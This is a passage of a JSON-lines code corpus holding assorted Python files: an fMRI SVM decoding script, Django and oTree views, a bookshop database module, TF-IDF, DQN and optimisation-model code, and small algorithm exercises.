__init__(self, engine: object, logger: object):\n self.engine = engine()\n self.logger = logger\n\n async def consumer(self, message):\n output_list = json.loads(message)\n self.logger.debug(f'INPUT json: {output_list}')\n # engine = self.engine.pwm_controller(manage_list=output_list)\n self.engine.pwm_controller(manage_list=output_list)\n\n\n async def websocket_server(self, websocket, path):\n async for message in websocket:\n await self.consumer(message)\n\n def start(self):\n start_server = websockets.serve(self.websocket_server, \"127.0.0.1\", 5685)\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n","sub_path":"pwm_manage/websocketruner.py","file_name":"websocketruner.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"209163769","text":"\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport os\nimport numpy as np\nimport nilearn\nimport glob\nimport nibabel as nib\nimport pandas as pd\nfrom nilearn.image import concat_imgs, index_img, smooth_img\nfrom nilearn.image import resample_to_img\n#from nilearn import plotting\nfrom nilearn.input_data import NiftiMasker\nfrom sklearn.svm import SVC\nfrom sklearn.cross_validation import LeaveOneLabelOut\nfrom sklearn.model_selection import cross_val_score, permutation_test_score\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.grid_search import GridSearchCV\nfrom nilearn import image\nfrom nilearn.plotting import plot_stat_map, show\nfrom sklearn.dummy import DummyClassifier\n\n\n\nbasepath=os.path.join('/projects','niblab','data','eric_data','W1','imagine')\noutpath = \"/projects/niblab/nilearn_projects\"\n\nfmri_subjs=os.path.join(outpath, 'concatenated_imagine_67.nii')\naverage_ana=os.path.join(outpath,'CS_avg_mprage_image.nii.gz')\nimag_mask=os.path.join(outpath,'power_roimask_4bi.nii.gz')\n#plot mask (Power ROIs) over anatomical that is defined above\n#plotting.plot_roi(imag_mask,bg_img=average_ana,cmap='Paired')\n#load labels for the functional data\nstim = os.path.join('/projects','niblab','scripts','nilean_stuff','label_67_sub.csv')\n\n\nfunc_df = pd.read_csv(stim, sep=\",\")\n#Retrieve the behavioral targets, that we are going to predict in the decoding\n#y_mask = labels['labels']\n#subs = labels['subs']\ny_mask = func_df['labels']\nsubs = func_df['subs']\n\n\n# In[19]:\n\n\n\n# ---STEP 3---\n#feature selection\n#To keep only data corresponding to app food or unapp food, we create a mask of the samples belonging to the condition.\n\ncondition_mask = func_df[\"labels\"].isin(['rest', 'app'])\n#condition_mask = func_df[\"labels\"].isin(['app', 'unapp', 'H2O'])\nprint(condition_mask.shape)\n#y = y_mask[condition_mask]\ny = y_mask[condition_mask]\nprint(y.shape)\nn_conditions = np.size(np.unique(y))\nprint(n_conditions)\n#n_conditions = np.size(np.unique(y))\nprint(y.unique())\n#session = func_df[condition_mask].to_records(index=False)\n#print(session.dtype.name)\nnifti_masker = NiftiMasker(mask_img=imag_mask, smoothing_fwhm=4,standardize=True, memory_level=0)\nfmri_trans = nifti_masker.fit_transform(fmri_subjs)\nprint(fmri_trans)\nX = fmri_trans[condition_mask]\nsubs = subs[condition_mask]\n\nsvc = SVC()\nsvc = SVC(kernel='linear', verbose=False)\nprint(svc)\nfrom sklearn.feature_selection import SelectPercentile, f_classif\n#feature_selection = SelectPercentile(f_classif, percentile=10)\nfeature_selection = SelectKBest(f_classif, k=1500)\nnp.warnings.filterwarnings('ignore')\n\nanova_svc = Pipeline([('anova',feature_selection), ('svc',svc)])\n#fit the decoder and predict\nanova_svc.fit(X, y)\ny_pred = anova_svc.predict(X)\n\nk_range = [10, 15, 30, 50 , 150, 300, 500, 1000, 1500, 3000, 5000]\n#cv_scores = cross_val_score(anova_svc, X[subs ==1], y[subs ==1])\ncv_scores = []\nscores_validation = []\n\nfor k in k_range:\n feature_selection.k = k\n #anova_svc.set_params(anova__k=feat svc__C=1.0).fit(X[subs == 1], y[subs == 1])\n cv_scores.append(np.mean(cross_val_score(anova_svc, X[subs ==1], y[subs ==1])))\n print(\"CV score: %.4f\" % cv_scores[-1])\n #scores_validation.append(np.mean(y_pred == y[subs == 0]))\n #print(\"score validation: %.4f\" % scores_validation[-1])\n anova_svc.fit(X[subs ==1], y[subs == 1])\n y_pred = anova_svc.predict(X[subs == 0])\n scores_validation.append(np.mean(y_pred == y[subs == 0]))\n print(\"score validation: %.4f\" % scores_validation[-1])\n\n# we are working with a composite estimator:\n# a pipeline of feature selection followed by SVC. Thus to give the name of the parameter that we want to tune we need to give the name of the step in\n# the pipeline, followed by the name of the parameter, with ‘__’ as a separator.\n# We are going to tune the parameter 'k' of the step called 'anova' in the pipeline. Thus we need to address it as 'anova__k'.\n# Note that GridSearchCV takes an n_jobs argument that can make it go much faster\ngrid = GridSearchCV(anova_svc, param_grid={'anova__k': k_range}, n_jobs=2)\nnested_cv_scores = cross_val_score(grid, X, y)\nclassification_accuracy = np.mean(nested_cv_scores)\nprint(\"Classification accuracy: %.4f / Chance level: %f\" %\n (classification_accuracy, 1. / n_conditions))\n\n\n\nprint(\"SCORE VALIDATION: \", scores_validation)\nprint(\"CV Scores: \", cv_scores)\n\n# plot\nplt.plot(cv_scores, label='Cross validation scores')\nplt.plot(scores_validation, label='Left-out validation data scores')\nplt.xticks(np.arange(len(k_range)), k_range)\nplt.axis('tight')\nplt.xlabel('k')\n\nplt.axhline(np.mean(nested_cv_scores),\n label='Nested cross-validation',\n color='r')\n\nplt.legend(loc='best', frameon=False)\nplt.show()\n\n\n# ---STEP 5---\n#flipping the martix backinto an image\ncoef = svc.coef_\nprint(coef)\n\n# reverse feature selection\ncoef = feature_selection.inverse_transform(coef)\n\n# reverse masking\nweight_img = nifti_masker.inverse_transform(coef)\n#plot image\nplt.plot_stat_map(weight_img, average_ana, title='SVM weights')\nplt.show()\n\n\nfrom sklearn.dummy import DummyClassifier\nnull_cv_scoresdumb = cross_val_score(DummyClassifier(), X, y, cv=10)\nprint(null_cv_scoresdumb)\nnull_cv_scoresdumb = cross_val_score(DummyClassifier(), X, y, cv=1)\nprint(null_cv_scoresdumb)\nmeannull_cv_scoresdumb = np.mean(null_cv_scoresdumb)\nprint(meannull_cv_scoresdumb)\n","sub_path":"TheBrainPipeline/analysis/nilearn_scripts/.ipynb_checkpoints/app_vs_rest_nest-checkpoint.py","file_name":"app_vs_rest_nest-checkpoint.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"157255905","text":"# -*- coding: utf-8 -*-\nfrom django.urls import path\n\nfrom . import views\n\n\napp_name = 'movies'\nurlpatterns = [\n path('', view=views.MovieListView.as_view(), name='index'),\n path('/',view=views.MovieDetailView.as_view(), name='detail'),\n path('create/', view=views.MovieCreateView.as_view(), name='create'),\n path('update//',view=views.MovieUpdateView.as_view(), name='update'),\n path('delete//',view=views.MovieDeleteView.as_view(), name='delete'),\n path('results/', views.SearchView.as_view(), name='search'),\n]\n","sub_path":"python-django-assessment/moviesapp/movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"650288989","text":"\"\"\"Provides the view of the team member widget.\"\"\"\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import never_cache\nfrom apps.managers.team_mgr import team_mgr\nfrom apps.managers.score_mgr import score_mgr\n\n\ndef supply(request, page_name):\n \"\"\"Supply view_objects content, which is the set of team members.\"\"\"\n _ = page_name\n\n # Get the team members.\n team = request.user.get_profile().team\n if team:\n members_with_points = []\n zero_point_members = []\n for member in team_mgr.team_members(team):\n if score_mgr.player_points(member) > 0:\n members_with_points.append(member)\n else:\n zero_point_members.append(member)\n else:\n members_with_points = None\n zero_point_members = None\n\n return {\n \"team_members\": members_with_points,\n \"zero_members\": zero_point_members,\n }\n\n\n@never_cache\n@login_required\ndef team_members(request):\n \"\"\"Provide the team members.\"\"\"\n team = request.user.get_profile().team\n if team:\n members = team_mgr.team_members(team)\n else:\n members = None\n\n return render_to_response(\"team_members.html\", {\n \"team_members\": members,\n }, context_instance=RequestContext(request))\n","sub_path":"makahiki/apps/widgets/team_members/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"187977267","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, sys\nimport time\nfrom scipy import signal\nimport utils\n\ndata_root = \"C:/Users/TobiasToft/Documents/GitHub/ABE_Master_thesis/PythonFiles/data_test/test/333_ref.wav\"\n\nx, fs = utils.wavToSamples(data_root)\nwL = 512\n\nplt.plot(x)\n\nR = int(np.round(0.25*wL))\n\npos = np.ceil(np.log2(wL))\n\nM = int(np.power(2,pos))\n\n# window\nw = np.hanning(wL)\n\n# FFT length\nN = int(wL)\n\n# Time and frequency resolution\ndT = N/fs\ndF = fs/N\n\n# Overlap\nO = N - R\n\n# Number of frames\nL = int(np.floor( (len(x)-O)/R ))\n\n# Indexes\nidx1 = 0\nidx2 = int(N)\n\npadZeros = np.zeros(M-N)\nX_r = np.empty((M,L))\nX_i = np.empty((M,L))\nX_abs = np.empty((M,L))\n\nfor i in range(0,L):\n\n\t# Extracting frame\n x_ = x[idx1:idx2]\n\n\t# Applying window\n x_ *= np.transpose(w)\n\n\t# Zeropadding to M FFT length\n x_ = np.concatenate((x_,padZeros))\n\n\t# FFT transform and power calculation\n xFFT = np.fft.fft(x_,M)\n xFFT = 2*xFFT/M\n\n\t#print(xFFT.imag)\n X_r[:,i] = xFFT.real\n X_i[:,i] = xFFT.imag\n\n X_abs[:,i] = np.abs(xFFT)**2\n\n\t# Updating indexes\n idx1 += R\n idx2 += R\n\n# Extracting positive frequencies only\nX_r = X_r[0:int(M/2),:]\nX_i = X_i[0:int(M/2),:]\nX_abs = X_abs[int(M/2):-1,:]\n\n\n\nplt.imshow(X_abs)\n\t#return X_abs,X_r, X_i\n\n\n\nf, t, Sxx = signal.spectrogram(x, fs,nfft=512)\nplt.imshow(X_abs)\n","sub_path":"PythonFiles/Tobias_temp/stft_temp.py","file_name":"stft_temp.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"25122475","text":"#Enter a file, we check if exists and then it executes script1.py (explained in the begining of script1.py)\nimport os.path\nfileorigin= input(\"Enter a filename \\n\")\nfileoriginA=fileorigin.split('.')\nfiledestination=fileoriginA[0]+\"_OUTPUT.html\"\n\n\n\nif os.path.exists(fileorigin): #check if file exists\n os.system(\"python script1.py \"+fileorigin+\" \"+filedestination+\" \"+fileoriginA[0])#passing args when calling the script\n\nelse:\n print(\"The file doesn't exists\")","sub_path":"chScript1/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"239829861","text":"import aiopg.sa\r\nfrom sqlalchemy import (\r\n MetaData, Table, Column, ForeignKey,\r\n Integer, String, Date, Numeric,\r\n select, and_\r\n)\r\nimport datetime as date\r\n\r\n\r\nmeta = MetaData()\r\n\r\n# Определение таблиц БД\r\nuser = Table(\r\n 'user', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('name', String(20), nullable=False),\r\n Column('surname', String(20), nullable=False),\r\n Column('fathers_name', String(20), nullable=False),\r\n Column('email', String(30), nullable=False, unique=True)\r\n)\r\n\r\nbook = Table(\r\n 'book', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('name', String(60), nullable=False),\r\n Column('author', String(30), nullable=False),\r\n Column('isbn', String(20), nullable=False, unique=True),\r\n Column('price', Numeric, nullable=False)\r\n)\r\n\r\nshop = Table(\r\n 'shop', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('name', String(20), nullable=False),\r\n Column('address', String(100), nullable=False),\r\n Column('post_code', Integer, nullable=False)\r\n)\r\n\r\nshop_inventory = Table(\r\n 'shop_inventory', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('shop_id', Integer, ForeignKey('shop.id')),\r\n Column('book_id', Integer, ForeignKey('book.id')),\r\n Column('book_quantity', Integer, server_default='0', nullable=False)\r\n)\r\n\r\norder = Table(\r\n 'order', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('reg_date', Date, nullable=False,\r\n server_default=date.datetime.today().strftime(\"%Y-%m-%d\")),\r\n Column('user_id', Integer, ForeignKey('user.id'))\r\n)\r\n\r\norder_position = Table(\r\n 'order_position', meta,\r\n\r\n Column('id', Integer, primary_key=True),\r\n Column('order_id', Integer, ForeignKey('order.id')),\r\n Column('book_id', Integer, ForeignKey('book.id')),\r\n Column('book_quantity', Integer, server_default='0', nullable=False),\r\n Column('shop_id', Integer, ForeignKey('shop.id'))\r\n)\r\n\r\n\r\n# Создание экзепляра 'двигателя (engine)' для возмжности отправки запросов в БД\r\nasync def init_pg(app):\r\n # Загрузка конфигурации БД\r\n conf = app['config']['postgres']\r\n # Создание экземпляра 'двигателя'\r\n engine = await aiopg.sa.create_engine(\r\n database=conf['database'],\r\n user=conf['user'],\r\n password=conf['password'],\r\n host=conf['host'],\r\n port=conf['port'],\r\n minsize=conf['minsize'],\r\n maxsize=conf['maxsize'],\r\n )\r\n # Присвоение экзепляра двигателя нашему приложению\r\n app['db'] = engine\r\n\r\n\r\n# Отключение экземпляра двигателя\r\nasync def close_pg(app):\r\n app['db'].close()\r\n await app['db'].wait_closed()\r\n\r\n\r\n# Определения новго класса ошибок разного рода при выполнении запросов в БД:\r\nclass RecordNotFound(Exception):\r\n \"\"\"Requested record in database was not found\"\"\"\r\n\r\n\r\n# Функция отправки запроса для получения данных пользователя\r\nasync def get_user(conn, uii=None, ei=None):\r\n # Определение параметра с помощью которого будет выполнен запрос\r\n # Является ли это id пользователя или email\r\n temp = None\r\n if uii:\r\n temp = uii\r\n col = user.c.id\r\n elif ei:\r\n temp = ei\r\n col = user.c.email\r\n # Сам запрос\r\n query = await conn.execute(\r\n user.select()\r\n .where(col == temp))\r\n result = await query.fetchall()\r\n # Проверка наличия данных в ответе на запроса\r\n if not result:\r\n msg = \"User with id/email: {} does not exists\"\r\n raise RecordNotFound(msg.format(temp))\r\n record = [dict(q) for q in result]\r\n return record\r\n\r\n\r\n# Функия получения истории запросов пользователя\r\nasync def get_order_list(conn, id_pointer=None, email_pointer=None):\r\n # Определение параметра (id/email) с помощью которого будет выполнен запрос\r\n temp = None\r\n if id_pointer:\r\n temp = id_pointer\r\n col = user.c.id\r\n elif email_pointer:\r\n temp = email_pointer\r\n col = user.c.email\r\n # Объединение таблиц\r\n j1 = user.join(order, user.c.id == order.c.user_id)\r\n j2 = j1.join(order_position, j1.c.order_id == order_position.c.order_id)\r\n j3 = j2.join(book, j2.c.order_position_book_id == book.c.id)\r\n # Выполнение запроса\r\n query = await conn.execute(select([user.c.id,\r\n user.c.name,\r\n order.c.reg_date,\r\n book.c.id,\r\n book.c.name,\r\n order_position.c.book_quantity,\r\n book.c.price\r\n ],\r\n use_labels=True\r\n )\r\n .select_from(j3)\r\n .where(col == temp))\r\n result = await query.fetchall()\r\n # Проверка наличия данных в ответе на запрос\r\n if not result:\r\n msg = \"User with id/email: {} doesn't exists or doesn't have any order\"\r\n raise RecordNotFound(msg.format(temp))\r\n record = [dict(q) for q in result]\r\n return record\r\n\r\n\r\n# Функция для определения инвентаря магазина\r\nasync def get_stock_list(conn, id_pointer=None, name_pointer=None):\r\n # Определение параметра (id/name) с помощью которого будет выполнен запрос\r\n temp = None\r\n if id_pointer:\r\n temp = id_pointer\r\n col = shop.c.id\r\n elif name_pointer:\r\n temp = name_pointer\r\n col = shop.c.name\r\n # Объединение таблиц\r\n j1 = shop_inventory.join(book, shop_inventory.c.book_id == book.c.id)\r\n j2 = j1.join(shop, j1.c.shop_inventory_shop_id == shop.c.id)\r\n # Выполнение запроса о состоянии инвентаря в БД\r\n query = await conn.execute(select([shop_inventory.c.book_id,\r\n book.c.name,\r\n shop_inventory.c.book_quantity\r\n ]\r\n )\r\n .select_from(j2)\r\n .where(col == temp)\r\n )\r\n\r\n # Чтобы скрыть отсутствующие книги:\r\n # .where(and_(col == temp,shop_inventory.c.book_quantity != 0))\r\n\r\n result = await query.fetchall()\r\n\r\n # Проверка наличия данных в ответе на запрос\r\n if not result:\r\n msg = \"Shop with id/name: {} does not exists\"\r\n raise RecordNotFound(msg.format(temp))\r\n\r\n record = [dict(q) for q in result]\r\n\r\n # Запрос в БД для получения информации о магазине (id, name, address)\r\n query2 = await conn.execute(shop.select().where(col == temp))\r\n result2 = await query2.fetchall()\r\n record2 = [dict(q) for q in result2]\r\n return record2, record\r\n\r\n\r\n# Функция добавления нового заказа в БД\r\nasync def add_order(\r\n conn, user_pointer, book_pointer,\r\n book_number, shop_pointer\r\n):\r\n # Проверка наличия user-id в БД\r\n check_user = await conn.execute(user.select()\r\n .where(user.c.id == user_pointer))\r\n check_user_res = await check_user.fetchall()\r\n if not check_user_res:\r\n msg = '''User with id:{} doesn't exists.\r\n To add an order, first create a user.'''\r\n raise RecordNotFound(msg.format(user_pointer))\r\n\r\n # Проверка наличия book-id в БД\r\n check_book = await conn.execute(book.select()\r\n .where(book.c.id == book_pointer))\r\n check_book_res = await check_book.fetchall()\r\n if not check_book_res:\r\n msg = '''Book with id: {} does not exists.\r\n To add an order, first create a book.'''\r\n raise RecordNotFound(msg.format(book_pointer))\r\n\r\n # Проверка наличия shop-id в БД\r\n check_shop = await conn.execute(shop.select()\r\n .where(shop.c.id == shop_pointer))\r\n check_shop_res = await check_shop.fetchall()\r\n if not check_shop_res:\r\n msg = '''Shop with id: {} does not exists.\r\n To add an order, first create a shop.'''\r\n raise RecordNotFound(msg.format(shop_pointer))\r\n\r\n # Определение количества книги в наличии\r\n shop_inventory\r\n query_book_have = await conn.execute(\r\n select([shop_inventory.c.book_quantity])\r\n .select_from(shop_inventory)\r\n .where(and_(shop_inventory.c.shop_id == shop_pointer,\r\n shop_inventory.c.book_id == book_pointer))\r\n )\r\n book_have = await query_book_have.fetchone()\r\n\r\n # Сравнение требуемого количества книг с наличием\r\n if book_number > book_have[0]:\r\n msg = '''The store (id: {}) does not have the required number of the book.\r\n Number of the book available: {}'''\r\n raise RecordNotFound(msg.format(shop_pointer, book_have[0]))\r\n\r\n # Добавление новой записи в таблицу Order\r\n await conn.execute(order.insert()\r\n .values(user_id=user_pointer))\r\n\r\n # Получение id из таб. Order, для последующей вставки в таб. Order_position\r\n query_order_id = await conn.execute(select([order.c.id])\r\n .order_by(order.c.id.desc()))\r\n record_order_id = await query_order_id.fetchone()\r\n\r\n # Добавление новой записи в таблицу Order_position\r\n await conn.execute(order_position.insert()\r\n .values(order_id=record_order_id[0],\r\n book_id=book_pointer,\r\n book_quantity=book_number,\r\n shop_id=shop_pointer))\r\n\r\n # Обновление количества книг в наличии в таблице shop_inventory\r\n books_left = book_have[0] - book_number\r\n await conn.execute(\r\n shop_inventory.update()\r\n .where(and_(shop_inventory.c.shop_id == shop_pointer,\r\n shop_inventory.c.book_id == book_pointer))\r\n .values(book_quantity=books_left)\r\n )\r\n return books_left\r\n","sub_path":"Book shop/main/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341745044","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport time\n\ndef load_data():\n print(\"正在加载数据....\")\n train = pd.read_csv(r'../Data/new_data/part_train_set.csv')\n test = pd.read_csv(r'../Data/new_data/part_test_set.csv')\n\n print(' 加载完毕')\n test_id = test[['id']].copy()\n column = \"word_seg\"\n # ngram_range:词组切分的长度范围\n # max_df:可以设置为范围在[0.0 1.0]的float,也可以设置为没有范围限制的int,默认为1.0。\n # 这个参数的作用是作为一个阈值,当构造语料库的关键词集的时候,如果某个词的document frequence大于max_df,这个词不会被当作关键词。\n # 如果这个参数是float,则表示词出现的次数与语料库文档数的百分比,如果是int,则表示词出现的次数。如果参数中已经给定了vocabulary,则这个参数无效\n # min_df:类似于max_df,不同之处在于如果某个词的document frequence小于min_df,则这个词不会被当作关键词\n # use_idf:默认为True,权值是tf*idf,如果设为False,将不使用idf,就是只使用tf,相当于CountVectorizer了\n # smooth_idf:idf平滑参数,默认为True,idf=ln((文档总数+1)/(包含该词的文档数+1))+1,如果设为False,idf=ln(文档总数/包含该词的文档数)+1\n # sublinear_tf:默认为False,如果设为True,则替换tf为1 + log(tf)。\n vec = TfidfVectorizer(min_df=3, max_df=0.9)\n # vec = TfidfVectorizer()\n train_term_doc = vec.fit_transform(train[column])\n test_term_doc = vec.transform(test[column])\n y = (train['class']).astype(int)\n data=dict()\n data['id'] = test_id['id']\n data['train'] = train_term_doc\n data['test'] = test_term_doc\n data['y'] = y\n del test_id['id'],train_term_doc,test_term_doc\n return data\n\nif __name__ == '__main__':\n train_Data = load_data()\n print('y:', train_Data['train'][0],train_Data['train'][1999].shape )\n\n\n","sub_path":"00_preprocess/TF_IDF.py","file_name":"TF_IDF.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454006666","text":"from ._builtin import Page, WaitPage\n\n\nclass Introduction(Page):\n\n def is_displayed(self):\n return self.player.round_number == 1\n\n\nclass Main(Page):\n form_model = 'player'\n form_fields = ['choice']\n\n\nclass ResultsWaitPage(WaitPage):\n\n def after_all_players_arrive(self):\n for p in self.group.get_players():\n p.set_payoff()\n\n\nclass Results(Page):\n\n def vars_for_template(self):\n return {\n 'player_payoff': int(self.player.payoff),\n 'opponent_choice': self.player.other_player().choice,\n }\n\n\nclass Final(Page):\n\n def is_displayed(self):\n return self.round_number == 5\n\n def vars_for_template(self):\n opponent = self.player.other_player()\n my_total = int(self.participant.payoff)\n opponent_total = int(opponent.participant.payoff)\n return {\n 'my_payoff': my_total,\n 'opponent_payoff': opponent_total\n }\n\n\npage_sequence = [\n Introduction,\n Main,\n ResultsWaitPage,\n Results,\n Final\n]\n","sub_path":"games/frontrunner/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"2551833","text":"from Model import Model\nimport math\n\n__author__ = 'kapilsomani'\n\n\nclass ZDT4(Model):\n def __init__(self, num_decisions=10, num_objectives=2):\n Model.__init__(self)\n self.num_decisions = 10 # Hard Coding\n self.num_objectives = 2 # Hard Coding\n self.min_decision_val = [0, -5, -5, -5, -5, -5, -5, -5, -5, -5]\n self.max_decision_val = [1, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n self.decisions = [0] * num_decisions\n self.objectives = []\n self.name = \"ZDT4\"\n self.optimum = {'min': 30.66, 'max': 306.42} # energy values approximated after multiple(x100000's) runs\n\n def constraints(self):\n\n def g1(can):\n return True\n\n return [g1]\n\n def objective_calc(self):\n\n def f(can):\n n = len(can)\n summ = sum([(x**2 - 10*math.cos(4*math.pi*x)) for x in can[1:]])\n g = 1 + 10*(n-1) + summ\n objectives_list = [None] * 2\n objectives_list[0] = can[0]\n objectives_list[1] = g * (1 - (can[0]/g)**2)\n self.objectives = objectives_list\n return objectives_list\n\n return f\n","sub_path":"hw/code/10/models/ZDT4.py","file_name":"ZDT4.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"147135836","text":"# @Author: dileep\n# @Last Modified by: dileep\n\nfrom typing import List, Dict, Tuple\nimport torch\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom .memory import Action, Event\nfrom .regulator import Regulator\nfrom .dqn.dddqn import Network\n\nStateType = Tuple[Dict[str, float], Dict[str, float]]\n\n\nclass DQNRegulator(Regulator):\n \"\"\"\n DQN regulator class\n\n Parameters\n ---------\n dfba_obj : DFBA\n DFBA instance\n\n Attributes\n ---------\n observation_size : int\n Dimensions of the observation space\n action_size : int\n Dimensions of the action space\n state_space : Dict[str, int]\n action_space : Dict[int, Tuple[str, str]]\n \"\"\"\n name = \"DQN\"\n _frac = 0.1\n _gamma = 0.99\n _update_delay = 100\n _temp = 1 # affects the certainity of actions\n _temp_increase = 0.001\n # _epsilon = 1.0\n # _epsilon_decay = 0.999\n\n def __init__(self, ex_reactions: List[str], ex_metabolites: List[str]) -> None:\n super().__init__(ex_reactions, ex_metabolites)\n self.eval_net = Network(self.state_size, self.action_size) # .cuda()\n self.target_net = Network(self.state_size, self.action_size) # .cuda()\n self.target_net.load_state_dict(self.eval_net.state_dict()) # hard reset\n self.optimizer = torch.optim.Adam(self.eval_net.parameters())\n self.criterion = F.smooth_l1_loss\n self.time_since_target_train = 0\n\n def select_action(self, concentrations: Dict[str, float], fluxes: Dict[str, float]) -> Action:\n \"\"\"\n Select action based on concentrations and fluxes\n Action selection is based on multinomial probability distribution\n\n Parameters\n ---------\n concentrations : Dict[str, float]\n Concentrations of the components of the media\n fluxes : Dict[str, float]\n Exchange fluxes of the reaction in the microbe\n \"\"\"\n state = self._encode_state(concentrations, fluxes)\n state = torch.from_numpy(state).float()\n if torch.cuda.is_available():\n state = state.cuda()\n x = Variable(state.unsqueeze_(0), volatile=True)\n probs = F.softmax(self.eval_net(x) * self._temp)\n action = probs.multinomial()\n decoded_action = self._decode_action(action.data[0, 0])\n return decoded_action\n\n def train(self):\n \"\"\"\n Network Training\n \"\"\"\n mini_batch = self.memory.sample(self._batch_size)\n mini_batch = Event(*zip(*mini_batch))\n # calculate the estimated value\n mini_batch_state = torch.Tensor(mini_batch.state)\n mini_batch_action = torch.LongTensor(mini_batch.action).unsqueeze(1)\n if torch.cuda.is_available():\n mini_batch_state = mini_batch_state.cuda()\n mini_batch_action = mini_batch_action.cuda()\n estimated_value = self.eval_net(Variable(mini_batch_state))\n estimated_value = estimated_value.gather(1, Variable(mini_batch_action))\n # calculate the actual value\n mini_batch_next_state = torch.Tensor(mini_batch.next_state)\n mini_batch_reward = torch.Tensor(mini_batch.reward).unsqueeze(1)\n if torch.cuda.is_available():\n mini_batch_next_state = mini_batch_next_state.cuda()\n mini_batch_reward = mini_batch_reward.cuda()\n target_value = self.target_net(Variable(mini_batch_next_state))\n target_value = target_value.detach().max(1)[0].unsqueeze(1)\n targetted_value = self._gamma * target_value + Variable(mini_batch_reward)\n # compute loss\n self.optimizer.zero_grad()\n loss = self.criterion(estimated_value, targetted_value)\n loss.backward()\n self.optimizer.step()\n self.time_since_target_train += 1\n # train target\n if self.time_since_target_train == self._update_delay:\n self.time_since_target_train = 0\n self.target_net.load_state_dict(self.eval_net.state_dict())\n self._temp += self._temp_increase\n\n def update(self, state_raw: StateType, action_raw: Action, next_state_raw: StateType,\n reward: float) -> None:\n \"\"\"\n Update the network with new events.\n If the network has accumulated enough events this function will also train it\n\n Parameters\n ---------\n state_raw : StateType\n The current raw state in the simulation\n action_raw : Action\n The action taken by the network in the simulation\n next_state_raw : StateType\n The next state in the simulation after taking the action\n reward : float\n The reward for the state transition\n \"\"\"\n state = self._encode_state(*state_raw)\n next_state = self._encode_state(*next_state_raw)\n action = self._encode_action(action_raw)\n self.memory.add_event(Event(state, action, next_state, reward))\n # training\n if len(self.memory) >= self._batch_size:\n self.train()\n\n def save(self) -> dict:\n \"\"\"\n Return model state parameters for saving\n \"\"\"\n parameters = {\n 'eval_net': self.eval_net.state_dict(),\n 'target_net': self.target_net.state_dict(),\n 'optimizer': self.optimizer.state_dict()\n }\n return parameters\n\n def load(self, parameters: dict) -> None:\n \"\"\"\n Load model state parameters from disk\n \"\"\"\n self.eval_net.load_state_dict(parameters['eval_net'])\n self.target_net.load_state_dict(parameters['target_net'])\n self.optimizer.load_state_dict(parameters['optimizer'])\n return None\n","sub_path":"microbial_ai/regulation/dqnregulator.py","file_name":"dqnregulator.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"11040905","text":"# deque로 BFS 구현\nfrom collections import deque\n\nm, n = map(int, input().split())\n# 2차원 리스트로 토마토 넣기\nbox = [list(map(int, input().split())) for _ in range(n)]\n# 좌표를 사용해 관리 할 것이므로 []로 초기화\nqueue = deque([])\ndx, dy = [-1, 1, 0, 0], [0, 0, -1, 1]\nres = 0\n\n# queue에 처음 받은 토마토의 위치 좌표 append\nfor i in range(n):\n for j in range(m):\n if box[i][j] == 1:\n queue.append([i, j])\n\ndef bfs():\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx, ny = dx[i] + x, dy[i] + y\n if 0 <= nx < n and 0 <= ny < m and box[nx][ny] == 0:\n box[nx][ny] = box[x][y] + 1\n queue.append([nx, ny])\n\nbfs()\n\nfor i in box:\n for j in i:\n if j == 0:\n print(-1) # 다 익지 못하는 경우\n exit(0)\n\t\t# 다 익힌 경우 최대 값 지정\n res = max(res, max(i))\n\nprint(res - 1)","sub_path":"03. DFS&BFS/7576/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"207097367","text":"# https://oj.leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a list of lists of integers\n def levelOrderBottom(self, root):\n if root 